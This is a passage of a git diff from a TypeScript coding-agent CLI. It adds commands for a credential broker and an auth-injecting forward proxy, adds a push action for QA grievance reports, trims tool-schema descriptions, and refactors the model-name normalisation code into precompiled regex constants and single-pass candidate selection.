"" : "s"}.`)); + return; + } + const remaining = total - result.pushed; + console.log( + chalk.red( + `Push failed after ${result.pushed}/${total}; ${remaining} grievance${remaining === 1 ? "" : "s"} remain unpushed.`, + ), + ); + process.exitCode = 1; + } finally { + db.close(); + } +} diff --git a/packages/coding-agent/src/commands/auth-broker.ts b/packages/coding-agent/src/commands/auth-broker.ts new file mode 100644 index 000000000..c6beb1f14 --- /dev/null +++ b/packages/coding-agent/src/commands/auth-broker.ts @@ -0,0 +1,96 @@ +/** + * `omp auth-broker` — manage the omp credential vault. + */ +import { Args, Command, Flags, renderCommandHelp } from "@oh-my-pi/pi-utils/cli"; +import { + AUTH_BROKER_ACTIONS, + type AuthBrokerAction, + type AuthBrokerCommandArgs, + runAuthBrokerCommand, +} from "../cli/auth-broker-cli"; +import { initTheme } from "../modes/theme/theme"; + +export default class AuthBroker extends Command { + static description = "Manage the omp auth-broker (credential vault)"; + + static args = { + action: Args.string({ + description: "Sub-command", + required: false, + options: [...AUTH_BROKER_ACTIONS], + }), + // Second positional: provider id (login/logout) or filesystem path (import). + source: Args.string({ + description: "OAuth provider id (login/logout) or path (import)", + required: false, + }), + }; + + static flags = { + json: Flags.boolean({ description: "Output JSON" }), + bind: Flags.string({ description: "Bind address for `serve` (host:port)", char: "b" }), + regenerate: Flags.boolean({ description: "Regenerate the bearer token" }), + via: Flags.string({ + description: "SSH user@host for remote login (login --via=user@host)", + }), + provider: Flags.string({ + description: "Override provider id for `import` (e.g. when JSON `type` is unrecognized)", + }), + "include-disabled": Flags.boolean({ + description: "Import credentials whose JSON has `disabled: true` (import)", + }), + "from-local": Flags.boolean({ + description: "migrate source: local SQLite + env vars (required for `migrate`)", + }), + "include-env": Flags.boolean({ + description: "Capture env-var API keys for providers not yet on broker (migrate)", + }), + "include-oauth": Flags.boolean({ + description: "Also upload OAuth from local SQLite during migrate (default skips them)", + }), + "dry-run": Flags.boolean({ description: "Print actions without executing (import / login --via / migrate)" }), + }; + + static examples = [ + "# Boot the broker against the local SQLite store\n omp auth-broker serve", + "# Boot on a non-default port\n omp auth-broker serve --bind=127.0.0.1:9000", + "# Print the bearer token\n omp auth-broker token", + "# Rotate the bearer token\n omp auth-broker token --regenerate", + "# Local login (run on the broker host)\n omp auth-broker login anthropic", + "# Remote login over SSH tunnel\n omp auth-broker login anthropic --via=user@broker", + "# Import a CLIProxyAPI auth dump\n omp auth-broker import ~/.cliproxy/auth", + "# Import a single CLIProxyAPI JSON, overriding the provider mapping\n omp auth-broker import ~/.cliproxy/auth/claude-foo.json --provider anthropic", + "# Preview a migration from local store + env vars to the configured broker\n omp auth-broker migrate --from-local --include-env --dry-run", + "# Apply the migration\n omp auth-broker migrate --from-local --include-env", + "# Health-check the configured remote broker\n omp auth-broker status", + ]; + + async run(): Promise<void> { + const { args, flags } = await this.parse(AuthBroker); + if (!args.action) { + renderCommandHelp("omp", "auth-broker", AuthBroker); + return; + } + const action = args.action as AuthBrokerAction; + const cmd: AuthBrokerCommandArgs = { + action, + flags: { + json: flags.json, + bind: flags.bind, + regenerate: flags.regenerate, + via: flags.via, + // `login`/`logout` reuse the legacy `provider` slot; `import` keeps `source` separate + // so `provider` flag (used as an override) is unambiguous. + provider: action === "import" ? flags.provider : (args.source ?? flags.provider), + source: args.source, + includeDisabled: flags["include-disabled"], + fromLocal: flags["from-local"], + includeEnv: flags["include-env"], + includeOauth: flags["include-oauth"], + dryRun: flags["dry-run"], + }, + }; + await initTheme(); + await runAuthBrokerCommand(cmd); + } +} diff --git a/packages/coding-agent/src/commands/auth-gateway.ts b/packages/coding-agent/src/commands/auth-gateway.ts new file mode 100644 index 000000000..6b91c52ee --- /dev/null +++ b/packages/coding-agent/src/commands/auth-gateway.ts @@ -0,0 +1,61 @@ +/** + * `omp auth-gateway` — run a forward proxy that injects auth from the broker. + */ +import { Args, Command, Flags, renderCommandHelp } from "@oh-my-pi/pi-utils/cli"; +import { + AUTH_GATEWAY_ACTIONS, + type AuthGatewayAction, + type AuthGatewayCommandArgs, + runAuthGatewayCommand, +} from "../cli/auth-gateway-cli"; +import { initTheme } from "../modes/theme/theme"; + +export default class AuthGateway extends Command { + static description = "Run an auth-gateway forward proxy backed by the configured broker"; + + static args = { + action: Args.string({ + description: "Sub-command", + required: false, + options: [...AUTH_GATEWAY_ACTIONS], + }), + }; + + static flags = { + json: Flags.boolean({ description: "Output JSON (token/status)" }), + bind: Flags.string({ description: "Bind address for `serve` (host:port)", char: "b" }), + regenerate: Flags.boolean({ description: "Regenerate the gateway bearer token (token)" }), + "no-auth": Flags.boolean({ + description: + "Disable inbound bearer-token auth (serve). Useful when bound to loopback — any caller is allowed.", + }), + }; + + static examples = [ + "# Boot the gateway against the configured broker\n omp auth-gateway serve", + "# Boot on a non-default port\n omp auth-gateway serve --bind=127.0.0.1:4000", + "# Print the gateway bearer token (creates one on first run)\n omp auth-gateway token", + "# Rotate the gateway bearer token\n omp auth-gateway token --regenerate", + "# Run on loopback without any bearer (anyone on this host can call)\n omp auth-gateway serve --no-auth", + "# Show local gateway + broker config status\n omp auth-gateway status", + ]; + + async run(): Promise<void> { + const { args, flags } = await this.parse(AuthGateway); + if (!args.action) { + renderCommandHelp("omp", "auth-gateway", AuthGateway); + return; + } + const cmd: AuthGatewayCommandArgs = { + action: args.action as AuthGatewayAction, + flags: { + json: flags.json, + bind: flags.bind, + regenerate: flags.regenerate, + noAuth: flags["no-auth"], + }, + }; + await initTheme(); + await runAuthGatewayCommand(cmd); + } +} diff --git a/packages/coding-agent/src/commands/grievances.ts b/packages/coding-agent/src/commands/grievances.ts index 026fc0a54..d651b1d90 100644 --- a/packages/coding-agent/src/commands/grievances.ts +++ b/packages/coding-agent/src/commands/grievances.ts @@ -1,20 +1,20 @@ /** - * View and clean recently reported tool issues from automated QA. + * View, clean, and push reported tool issues from automated QA. */ import { Args, Command, Flags } from "@oh-my-pi/pi-utils/cli"; -import { cleanGrievances, listGrievances } from "../cli/grievances-cli"; +import { cleanGrievances, listGrievances, pushGrievances } from "../cli/grievances-cli"; export default class Grievances extends Command { - static description = "View or clean reported tool issues (auto-QA grievances)"; + static description = "View, clean, or push reported tool issues (auto-QA grievances)"; static args = { - // Positional action: "list" (default) or "clean". A positional arg keeps - // the historical `omp grievances` invocation working unchanged while - // reusing the same command surface for the new clean sub-action. + // Positional action: "list" (default), "clean", or "push". A positional + // arg keeps the historical `omp grievances` invocation working unchanged + // while reusing the same command surface for the clean/push verbs. action: Args.string({ - description: "list (default) or clean", + description: "list (default), clean, or push", required: false, - options: ["list", "clean"], + options: ["list", "clean", "push"], default: "list", }), }; @@ -33,6 +33,7 @@ export default class Grievances extends Command { "omp grievances clean --id 209", "omp grievances clean --tool find", "omp grievances clean --all", + "omp grievances push", ]; async run(): Promise<void> { @@ -41,6 +42,10 @@ export default class Grievances extends Command { await cleanGrievances({ id: flags.id, tool: flags.tool, all: flags.all, json: flags.json }); return; } + if (args.action === "push") { + await pushGrievances({ json: flags.json }); + return; + } await listGrievances({ limit: flags.limit, tool: flags.tool, json: flags.json }); } } diff --git a/packages/coding-agent/src/commands/launch.ts b/packages/coding-agent/src/commands/launch.ts index c74392592..8c513ad77 100644 --- a/packages/coding-agent/src/commands/launch.ts +++ b/packages/coding-agent/src/commands/launch.ts @@ -23,7 +23,7 @@ export default class Index extends Command { static flags = { model: Flags.string({ - description: 'Model to use (fuzzy match: "opus", "gpt-5.2", or "p-openai/gpt-5.2")', + description: 'Model to use (fuzzy match: "opus", "gpt-5.2", or "openai/gpt-5.2")', }), smol: Flags.string({ description: "Smol/fast model for lightweight tasks (or PI_SMOL_MODEL env)", diff --git a/packages/coding-agent/src/commit/agentic/tools/analyze-file.ts b/packages/coding-agent/src/commit/agentic/tools/analyze-file.ts index 38c0055b0..78f0e7b2b 100644 --- a/packages/coding-agent/src/commit/agentic/tools/analyze-file.ts +++ b/packages/coding-agent/src/commit/agentic/tools/analyze-file.ts @@ -13,8 +13,8 @@ import type { ToolSession } from "../../../tools"; import { getFilePriority } from "./git-file-diff"; const analyzeFileSchema = z.object({ - files: z.array(z.string().describe("File path")).min(1), - goal: z.string().describe("Optional analysis focus").optional(), + files: z.array(z.string().describe("file path")).min(1), + goal: z.string().describe("analysis focus").optional(), }); const analyzeFileOutputSchema = { diff --git a/packages/coding-agent/src/commit/agentic/tools/git-file-diff.ts b/packages/coding-agent/src/commit/agentic/tools/git-file-diff.ts index 345413e70..bba265821 100644 --- a/packages/coding-agent/src/commit/agentic/tools/git-file-diff.ts +++ b/packages/coding-agent/src/commit/agentic/tools/git-file-diff.ts @@ -132,8 +132,8 @@ function processDiffs(files: string[], diffs: Map<string, string>): { result: st } const gitFileDiffSchema = z.object({ - files: z.array(z.string().describe("Files to diff")).min(1).max(10), - staged: z.boolean().describe("Use staged changes (default: true)").optional(), + files: z.array(z.string().describe("file to diff")).min(1).max(10), + staged: z.boolean().describe("use staged changes (default true)").optional(), }); export function createGitFileDiffTool(cwd: string, state: CommitAgentState): CustomTool<typeof gitFileDiffSchema> { diff --git a/packages/coding-agent/src/commit/agentic/tools/git-hunk.ts b/packages/coding-agent/src/commit/agentic/tools/git-hunk.ts index 37cd1272b..1f0044e7b 100644 --- a/packages/coding-agent/src/commit/agentic/tools/git-hunk.ts +++ b/packages/coding-agent/src/commit/agentic/tools/git-hunk.ts @@ -4,9 +4,9 @@ import type { CustomTool } from "../../../extensibility/custom-tools/types"; import * as git from "../../../utils/git"; const gitHunkSchema = z.object({ - file: z.string().describe("File path"), - hunks: z.array(z.number().describe("1-based hunk indices")).min(1).optional(), - staged: z.boolean().describe("Use staged changes (default: true)").optional(), + file: z.string().describe("file path"), + hunks: z.array(z.number().describe("1-based hunk index")).min(1).optional(), + staged: z.boolean().describe("use staged changes (default true)").optional(), }); function selectHunks(fileHunks: FileHunks, requested?: number[]): DiffHunk[] { diff --git a/packages/coding-agent/src/commit/agentic/tools/git-overview.ts b/packages/coding-agent/src/commit/agentic/tools/git-overview.ts index 3e66f52c1..b8b22faaf 100644 --- a/packages/coding-agent/src/commit/agentic/tools/git-overview.ts +++ b/packages/coding-agent/src/commit/agentic/tools/git-overview.ts @@ -43,8 +43,8 @@ function filterExcludedFiles(files: string[]): { filtered: string[]; excluded: s } const gitOverviewSchema = z.object({ - staged: z.boolean().describe("Use staged changes (default: true)").optional(), - include_untracked: z.boolean().describe("Include untracked files when staged=false").optional(), + staged: z.boolean().describe("use staged changes (default true)").optional(), + include_untracked: z.boolean().describe("include untracked when unstaged").optional(), }); export function createGitOverviewTool(cwd: string, state: CommitAgentState): CustomTool<typeof gitOverviewSchema> { diff --git a/packages/coding-agent/src/commit/agentic/tools/propose-changelog.ts b/packages/coding-agent/src/commit/agentic/tools/propose-changelog.ts index 8d28fff6b..a81be11c6 100644 --- a/packages/coding-agent/src/commit/agentic/tools/propose-changelog.ts +++ b/packages/coding-agent/src/commit/agentic/tools/propose-changelog.ts @@ -12,9 +12,7 @@ const changelogEntryProperties = CHANGELOG_CATEGORIES.reduce<Record<ChangelogCat ); const changelogEntriesSchema = z.object(changelogEntryProperties); -const changelogDeletionsSchema = z - .object(changelogEntryProperties) - .describe("Entries to remove from existing changelog sections (case-insensitive match)"); +const changelogDeletionsSchema = z.object(changelogEntryProperties).describe("entries to remove"); const changelogEntrySchema = z.object({ path: z.string(), diff --git a/packages/coding-agent/src/commit/agentic/tools/recent-commits.ts b/packages/coding-agent/src/commit/agentic/tools/recent-commits.ts index 1cde4ef8c..2a0538fe4 100644 --- a/packages/coding-agent/src/commit/agentic/tools/recent-commits.ts +++ b/packages/coding-agent/src/commit/agentic/tools/recent-commits.ts @@ -3,7 +3,7 @@ import type { CustomTool } from "../../../extensibility/custom-tools/types"; import * as git from "../../../utils/git"; const recentCommitsSchema = z.object({ - count: z.number().min(1).max(50).describe("Number of commits to fetch").optional(), + count: z.number().min(1).max(50).describe("commit count").optional(), }); interface RecentCommitStats { diff --git a/packages/coding-agent/src/commit/agentic/tools/schemas.ts b/packages/coding-agent/src/commit/agentic/tools/schemas.ts index 6f0c49eaf..96512c8fc 100644 --- a/packages/coding-agent/src/commit/agentic/tools/schemas.ts +++ b/packages/coding-agent/src/commit/agentic/tools/schemas.ts @@ -17,15 +17,7 @@ export const commitTypeSchema = z.enum([ export const detailSchema = z.object({ text: z.string(), changelog_category: z - .union([ - z.literal("Added"), - z.literal("Changed"), - z.literal("Fixed"), - z.literal("Deprecated"), - z.literal("Removed"), - z.literal("Security"), - z.literal("Breaking Changes"), - ]) + .enum(["Added", "Changed", "Fixed", "Deprecated", "Removed", "Security", "Breaking Changes"]) .optional(), user_visible: z.boolean().optional(), }); diff --git a/packages/coding-agent/src/config/model-equivalence.ts b/packages/coding-agent/src/config/model-equivalence.ts index 100344d8c..722ab4601 100644 --- a/packages/coding-agent/src/config/model-equivalence.ts +++ b/packages/coding-agent/src/config/model-equivalence.ts @@ -41,35 +41,8 @@ interface ResolvedCanonicalModel { source: CanonicalModelSource; } -const TRAILING_CANONICAL_MARKERS = [ - "thinking", - "customtools", - "high", - "low", - "medium", - "minimal", - "xhigh", - "free", - "cloud", - "exacto", - "nitro", - "original", - "optimized", - "nvfp4", - "fp8", - "fp4", - "bf16", - "int8", - "int4", -] as const; -const TRAILING_MARKER_SUFFIXES: readonly string[] = (() => { - const suffixes: string[] = []; - for (const marker of TRAILING_CANONICAL_MARKERS) { - const lower = marker.toLowerCase(); - suffixes.push(`-${lower}`, `:${lower}`); - } - return suffixes; -})(); +const TRAILING_MARKER_PATTERN = + /[-:](?:thinking|customtools|high|low|medium|minimal|xhigh|free|cloud|exacto|nitro|original|optimized|nvfp4|fp8|fp4|bf16|int8|int4)$/i; const WRAPPER_PREFIXES = ["duo-chat-"] as const; let referenceDataCache: CanonicalReferenceData | undefined; @@ -77,7 +50,10 @@ const EMPTY_COMPILED_EQUIVALENCE: CompiledEquivalenceConfig = { overrides: new Map<string, string>(), exclude: new Set<string>(), }; -const resolutionCache: WeakMap<CompiledEquivalenceConfig, WeakMap<Model<Api>, ResolvedCanonicalModel>> = new WeakMap(); +const kModelResolutionCache = Symbol("model-equivalence.resolutionCache"); +interface CompiledEquivalenceConfigWithCache extends CompiledEquivalenceConfig { + [kModelResolutionCache]?: WeakMap<Model<Api>, ResolvedCanonicalModel>; +} const FAMILY_EXTRACTION_PATTERNS = [ /(?:^|[/:._-])((?:claude|gemini|gpt|grok|glm|qwen|minimax|kimi|deepseek|llama|gemma|nova|mistral|ministral|pixtral|codestral|devstral|magistral|ernie|doubao|seed|aion|olmo|molmo|nemotron|palmyra|command|codex|coder|o[1345])[-a-z0-9.]+)(?::|$)/i, /(?:^|[/:._-])((?:claude|gemini|gpt|grok|glm|qwen|minimax|kimi|deepseek|llama|gemma|nova|mistral|ministral|pixtral|codestral|devstral|magistral|ernie|doubao|seed|aion|olmo|molmo|nemotron|palmyra|command|codex|coder|o[1345])[-a-z0-9.]+(?:[-_/][a-z0-9.]+)*)(?::|$)/i, @@ -172,13 +148,12 @@ function addCanonicalCandidate(candidates: Set<string>, candidate: string): void } function stripTrailingMarker(candidate: string): string | undefined { - const lower = candidate.toLowerCase(); - for (const suffix of TRAILING_MARKER_SUFFIXES) { - if (lower.endsWith(suffix)) { - return candidate.slice(0, -suffix.length); - } - } - return undefined; + const match = TRAILING_MARKER_PATTERN.exec(candidate); + return match ? candidate.slice(0, match.index) : undefined; +} + +function hasTrailingMarker(candidate: string): boolean { + return TRAILING_MARKER_PATTERN.test(candidate); } function lowercaseCandidate(candidate: string): string | undefined { @@ -186,23 +161,41 @@ function lowercaseCandidate(candidate: string): string | undefined { return lowercased !== candidate ? lowercased : undefined; } +const STRIP_SYNTHETIC_PREFIX_PATTERN = /^hf:/i; +const STRIP_LATEST_SUFFIX_PATTERN = /-latest$/i; +const STRIP_LEGACY_GLM_TURBO_PATTERN = /^(glm-4(?:\.\d+)?v?)-turbo$/i; +const REORDER_ANTHROPIC_FAMILY_PATTERN = /^claude-(\d+(?:[.-]\d+)+)-(opus|sonnet|haiku)$/i; +const STRIP_PROVIDER_VERSION_SUFFIX_PATTERN = /-v\d+(?::\d+)?$/i; +const STRIP_DATE_SUFFIX_PATTERN = /-\d{8}$/i; +const INSERT_ATTACHED_FAMILY_VERSION_SEPARATOR_PATTERN = + /(^|[/:._-])((?:claude|gemini|gpt|grok|glm|qwen|minimax|kimi|deepseek|llama|gemma|nova|mistral|ministral|pixtral|codestral|devstral|magistral|ernie|doubao|seed|aion|olmo|molmo|nemotron|palmyra|command|codex|coder))(\d+(?:[.-]\d+)*)(?=$|[-_/.:a-z])/gi; +const SERIES_MINOR_DOT_TO_DASH_PATTERN = /(^|[/:._-])([a-z])(\d)\.(\d)(?=$|[-_/.:a-z])/gi; +const SERIES_MINOR_DASH_TO_DOT_PATTERN = /(^|[/:._-])([a-z])(\d)-(\d)(?=$|[-_/.:a-z])/gi; +const EXPAND_COMPACT_SERIES_MINOR_PATTERN = /(^|[/:._-])([a-z])(\d)(\d)(?=$|[-_/.:a-z])/gi; +const NAMESPACE_SUFFIX_BOUNDARY_PATTERN = /[/:.]/; +const NAMESPACE_SUFFIX_ALPHA_PATTERN = /[a-z]/i; +const NAMESPACE_SUFFIX_DIGIT_PATTERN = /\d/; +const SHORT_VERSION_DOT_TO_DASH_PATTERN = /(^|[-_/])(\d{1,2})\.(\d{1,2})(?=$|[-_a-z])/gi; +const SHORT_VERSION_DASH_TO_DOT_PATTERN = /(^|[-_/])(\d{1,2})-(\d{1,2})(?=$|[-_a-z])/gi; +const EXPAND_COMPACT_MINOR_PATTERN = /(^|[-_/])(\d)(\d)(?=$|[-_a-z])/g; + function stripSyntheticPrefix(candidate: string): string | undefined { - const stripped = candidate.replace(/^hf:/i, ""); + const stripped = candidate.replace(STRIP_SYNTHETIC_PREFIX_PATTERN, ""); return stripped !== candidate ? stripped : undefined; } function stripLatestSuffix(candidate: string): string | undefined { - const stripped = candidate.replace(/-latest$/i, ""); + const stripped = candidate.replace(STRIP_LATEST_SUFFIX_PATTERN, ""); return stripped !== candidate ? stripped : undefined; } function stripLegacyGlmTurboSuffix(candidate: string): string | undefined { - const stripped = candidate.replace(/^(glm-4(?:\.\d+)?v?)-turbo$/i, "$1"); + const stripped = candidate.replace(STRIP_LEGACY_GLM_TURBO_PATTERN, "$1"); return stripped !== candidate ? stripped : undefined; } function reorderAnthropicFamily(candidate: string): string | undefined { - const match = /^claude-(\d+(?:[.-]\d+)+)-(opus|sonnet|haiku)$/i.exec(candidate); + const match = REORDER_ANTHROPIC_FAMILY_PATTERN.exec(candidate); if (!match) { return undefined; } @@ -211,30 +204,27 @@ function reorderAnthropicFamily(candidate: string): string | undefined { } function stripProviderVersionSuffix(candidate: string): string | undefined { - const stripped = candidate.replace(/-v\d+(?::\d+)?$/i, ""); + const stripped = candidate.replace(STRIP_PROVIDER_VERSION_SUFFIX_PATTERN, ""); return stripped !== candidate ? stripped : undefined; } function stripDateSuffix(candidate: string): string | undefined { - const stripped = candidate.replace(/-\d{8}$/i, ""); + const stripped = candidate.replace(STRIP_DATE_SUFFIX_PATTERN, ""); return stripped !== candidate ? stripped : undefined; } function insertAttachedFamilyVersionSeparator(candidate: string): string | undefined { - const inserted = candidate.replace( - /(^|[/:._-])((?:claude|gemini|gpt|grok|glm|qwen|minimax|kimi|deepseek|llama|gemma|nova|mistral|ministral|pixtral|codestral|devstral|magistral|ernie|doubao|seed|aion|olmo|molmo|nemotron|palmyra|command|codex|coder))(\d+(?:[.-]\d+)*)(?=$|[-_/.:a-z])/gi, - "$1$2-$3", - ); + const inserted = candidate.replace(INSERT_ATTACHED_FAMILY_VERSION_SEPARATOR_PATTERN, "$1$2-$3"); return inserted !== candidate ? inserted : undefined; } function toggleSeriesMinorVersionSeparators(candidate: string): string[] { const toggled = new Set<string>(); - const dotToDash = candidate.replace(/(^|[/:._-])([a-z])(\d)\.(\d)(?=$|[-_/.:a-z])/gi, "$1$2$3-$4"); + const dotToDash = candidate.replace(SERIES_MINOR_DOT_TO_DASH_PATTERN, "$1$2$3-$4"); if (dotToDash !== candidate) { toggled.add(dotToDash); } - const dashToDot = candidate.replace(/(^|[/:._-])([a-z])(\d)-(\d)(?=$|[-_/.:a-z])/gi, "$1$2$3.$4"); + const dashToDot = candidate.replace(SERIES_MINOR_DASH_TO_DOT_PATTERN, "$1$2$3.$4"); if (dashToDot !== candidate) { toggled.add(dashToDot); } @@ -243,33 +233,51 @@ function toggleSeriesMinorVersionSeparators(candidate: string): string[] { function expandCompactSeriesMinorVersions(candidate: string): string[] { const expanded = new Set<string>(); - const compactToDash = candidate.replace(/(^|[/:._-])([a-z])(\d)(\d)(?=$|[-_/.:a-z])/gi, "$1$2$3-$4"); + const compactToDash = candidate.replace(EXPAND_COMPACT_SERIES_MINOR_PATTERN, "$1$2$3-$4"); if (compactToDash !== candidate) { expanded.add(compactToDash); } - const compactToDot = candidate.replace(/(^|[/:._-])([a-z])(\d)(\d)(?=$|[-_/.:a-z])/gi, "$1$2$3.$4"); + const compactToDot = candidate.replace(EXPAND_COMPACT_SERIES_MINOR_PATTERN, "$1$2$3.$4"); if (compactToDot !== candidate) { expanded.add(compactToDot); } return [...expanded]; } +// Bounded FIFO memo: pure function of `candidate`. Cached arrays are read-only at +// every callsite (they are iterated to push into a queue — never mutated), so we +// safely return the same instance. Cap keeps memory bounded under adversarial +// model-id churn. +const QUALIFIED_NAMESPACE_SUFFIX_CACHE = new Map<string, string[]>(); +const QUALIFIED_NAMESPACE_SUFFIX_CACHE_CAP = 256; function getQualifiedNamespaceSuffixes(candidate: string): string[] { + const cached = QUALIFIED_NAMESPACE_SUFFIX_CACHE.get(candidate); + if (cached !== undefined) { + return cached; + } const results = new Set<string>(); for (let index = 1; index < candidate.length; index += 1) { - if (!/[/:.]/.test(candidate[index - 1]!)) { + if (!NAMESPACE_SUFFIX_BOUNDARY_PATTERN.test(candidate[index - 1]!)) { continue; } const suffix = candidate.slice(index); if (suffix.length < 4) { continue; } - if (!/[a-z]/i.test(suffix) || !/\d/.test(suffix)) { + if (!NAMESPACE_SUFFIX_ALPHA_PATTERN.test(suffix) || !NAMESPACE_SUFFIX_DIGIT_PATTERN.test(suffix)) { continue; } addCanonicalCandidate(results, suffix); } - return [...results]; + const output = [...results]; + if (QUALIFIED_NAMESPACE_SUFFIX_CACHE.size >= QUALIFIED_NAMESPACE_SUFFIX_CACHE_CAP) { + const oldest = QUALIFIED_NAMESPACE_SUFFIX_CACHE.keys().next().value; + if (oldest !== undefined) { + QUALIFIED_NAMESPACE_SUFFIX_CACHE.delete(oldest); + } + } + QUALIFIED_NAMESPACE_SUFFIX_CACHE.set(candidate, output); + return output; } function extractUpstreamFamilyCandidate(candidate: string): string | undefined { @@ -282,6 +290,15 @@ function extractUpstreamFamilyCandidate(candidate: string): string | undefined { return undefined; } +const PENALTY_DATE_SUFFIX = /-\d{8}$/i; +const PENALTY_PROVIDER_VERSION_SUFFIX = /-v\d+(?::\d+)?$/i; +const PENALTY_HAS_UPPERCASE = /[A-Z]/; +const PENALTY_CLAUDE_LEADING_VERSION = /^claude-\d/i; +const PENALTY_CLAUDE_LEGACY_DATE = /^claude-(?:opus|sonnet|haiku)-\d{2}(?=$|[-_a-z])/i; +const PENALTY_LETTER_DIGIT_DIGIT = /(?:^|[/:._-])[a-z]\d-\d(?=$|[-_/.:a-z])/i; +const PENALTY_DIGIT_DIGIT = /(?:^|[-_/])\d-\d(?=$|[-_a-z])/; +const PENALTY_CLAUDE_FAMILY_DIGIT_DIGIT = /^claude-(?:opus|sonnet|haiku)-\d-\d/i; + function getCandidatePenalty(candidate: string): number { let penalty = 0; if (candidate.includes("/")) { @@ -290,28 +307,28 @@ function getCandidatePenalty(candidate: string): number { if (candidate.includes(":")) { penalty += 40; } - if (/-\d{8}$/i.test(candidate)) { + if (PENALTY_DATE_SUFFIX.test(candidate)) { penalty += 25; } - if (/-v\d+(?::\d+)?$/i.test(candidate)) { + if (PENALTY_PROVIDER_VERSION_SUFFIX.test(candidate)) { penalty += 25; } - if (stripTrailingMarker(candidate)) { + if (hasTrailingMarker(candidate)) { penalty += 20; } - if (/[A-Z]/.test(candidate)) { + if (PENALTY_HAS_UPPERCASE.test(candidate)) { penalty += 10; } - if (/^claude-\d/i.test(candidate)) { + if (PENALTY_CLAUDE_LEADING_VERSION.test(candidate)) { penalty += 20; } - if (/^claude-(?:opus|sonnet|haiku)-\d{2}(?=$|[-_a-z])/i.test(candidate)) { + if (PENALTY_CLAUDE_LEGACY_DATE.test(candidate)) { penalty += 10; } - if (/(?:^|[/:._-])[a-z]\d-\d(?=$|[-_/.:a-z])/i.test(candidate)) { + if (PENALTY_LETTER_DIGIT_DIGIT.test(candidate)) { penalty += 6; } - if (/(?:^|[-_/])\d-\d(?=$|[-_a-z])/.test(candidate) && !/^claude-(?:opus|sonnet|haiku)-\d-\d/i.test(candidate)) { + if (PENALTY_DIGIT_DIGIT.test(candidate) && !PENALTY_CLAUDE_FAMILY_DIGIT_DIGIT.test(candidate)) { penalty += 4; } penalty += candidate.length * 0.01; @@ -333,8 +350,40 @@ function selectBestOfficialCandidate(candidates: readonly string[]): string | un if (candidates.length === 0) { return undefined; } - const ranked = [...new Set(candidates)].sort(compareCandidatePreference); - return ranked[0]; + let bestCandidate: string | undefined; + let bestPenalty = 0; + let bestLength = 0; + for (const candidate of candidates) { + const penalty = getCandidatePenalty(candidate); + const length = candidate.length; + if (bestCandidate === undefined) { + bestCandidate = candidate; + bestPenalty = penalty; + bestLength = length; + continue; + } + if (penalty < bestPenalty) { + bestCandidate = candidate; + bestPenalty = penalty; + bestLength = length; + continue; + } + if (penalty > bestPenalty) { + continue; + } + if (length < bestLength) { + bestCandidate = candidate; + bestLength = length; + continue; + } + if (length > bestLength) { + continue; + } + if (candidate.localeCompare(bestCandidate) < 0) { + bestCandidate = candidate; + } + } + return bestCandidate; } function getWrapperCanonicalCandidates(candidate: string): string[] { @@ -405,48 +454,81 @@ function parseClaudeFamilyVersionSegments(candidate: string, prefix: string): nu return versionSegments; } +const CLAUDE_FAMILY_ALIAS_PATTERN = /^(?:anthropic\/)?(claude(?:-\d(?:[.-]\d+)?)?-(?:haiku|opus|sonnet))(?:-latest)?$/i; +const CLAUDE_DATE_SUFFIX_PATTERN = /-\d{8}(?:$|-)/i; + function getClaudeFamilyAliasOfficial(candidate: string, officialIds: Set<string>): string | undefined { - const match = /^(?:anthropic\/)?(claude(?:-\d(?:[.-]\d+)?)?-(?:haiku|opus|sonnet))(?:-latest)?$/i.exec(candidate); + const match = CLAUDE_FAMILY_ALIAS_PATTERN.exec(candidate); if (!match?.[1]) { return undefined; } const familyPrefix = match[1].toLowerCase(); - const familyMatches = [...officialIds].filter(officialId => { - const normalizedOfficialId = officialId.toLowerCase(); - return normalizedOfficialId.startsWith(`${familyPrefix}-`) || normalizedOfficialId === familyPrefix; - }); - if (familyMatches.length === 0) { - return undefined; - } - return [...familyMatches].sort((left, right) => { - const versionDiff = compareVersionSegments( - parseClaudeFamilyVersionSegments(right, familyPrefix), - parseClaudeFamilyVersionSegments(left, familyPrefix), - ); + const familyPrefixWithDash = `${familyPrefix}-`; + + let best: string | undefined; + let bestVersion: number[] = []; + let bestHasDate = false; + let bestHasMarker = false; + + for (const officialId of officialIds) { + const normalized = officialId.toLowerCase(); + if (normalized !== familyPrefix && !normalized.startsWith(familyPrefixWithDash)) { + continue; + } + const version = parseClaudeFamilyVersionSegments(officialId, familyPrefix); + const hasDate = CLAUDE_DATE_SUFFIX_PATTERN.test(officialId); + const hasMarker = hasTrailingMarker(officialId); + + if (best === undefined) { + best = officialId; + bestVersion = version; + bestHasDate = hasDate; + bestHasMarker = hasMarker; + continue; + } + + const versionDiff = compareVersionSegments(version, bestVersion); if (versionDiff !== 0) { - return versionDiff; + if (versionDiff > 0) { + best = officialId; + bestVersion = version; + bestHasDate = hasDate; + bestHasMarker = hasMarker; + } + continue; } - const leftHasDate = /-\d{8}(?:$|-)/i.test(left); - const rightHasDate = /-\d{8}(?:$|-)/i.test(right); - if (leftHasDate !== rightHasDate) { - return leftHasDate ? 1 : -1; + if (hasDate !== bestHasDate) { + if (!hasDate) { + best = officialId; + bestVersion = version; + bestHasDate = hasDate; + bestHasMarker = hasMarker; + } + continue; } - const leftHasMarker = stripTrailingMarker(left) !== undefined; - const rightHasMarker = stripTrailingMarker(right) !== undefined; - if (leftHasMarker !== rightHasMarker) { - return leftHasMarker ? 1 : -1; + if (hasMarker !== bestHasMarker) { + if (!hasMarker) { + best = officialId; + bestVersion = version; + bestHasMarker = hasMarker; + } + continue; } - return compareCandidatePreference(left, right); - })[0]; + if (compareCandidatePreference(officialId, best) < 0) { + best = officialId; + bestVersion = version; + } + } + return best; } function toggleShortVersionSeparators(candidate: string): string[] { const toggled = new Set<string>(); - const dotToDash = candidate.replace(/(^|[-_/])(\d{1,2})\.(\d{1,2})(?=$|[-_a-z])/gi, "$1$2-$3"); + const dotToDash = candidate.replace(SHORT_VERSION_DOT_TO_DASH_PATTERN, "$1$2-$3"); if (dotToDash !== candidate) { toggled.add(dotToDash); } - const dashToDot = candidate.replace(/(^|[-_/])(\d{1,2})-(\d{1,2})(?=$|[-_a-z])/gi, "$1$2.$3"); + const dashToDot = candidate.replace(SHORT_VERSION_DASH_TO_DOT_PATTERN, "$1$2.$3"); if (dashToDot !== candidate) { toggled.add(dashToDot); } @@ -455,20 +537,112 @@ function toggleShortVersionSeparators(candidate: string): string[] { function expandCompactMinorVersions(candidate: string): string[] { const expanded = new Set<string>(); - const compactToDash = candidate.replace(/(^|[-_/])(\d)(\d)(?=$|[-_a-z])/g, "$1$2-$3"); + const 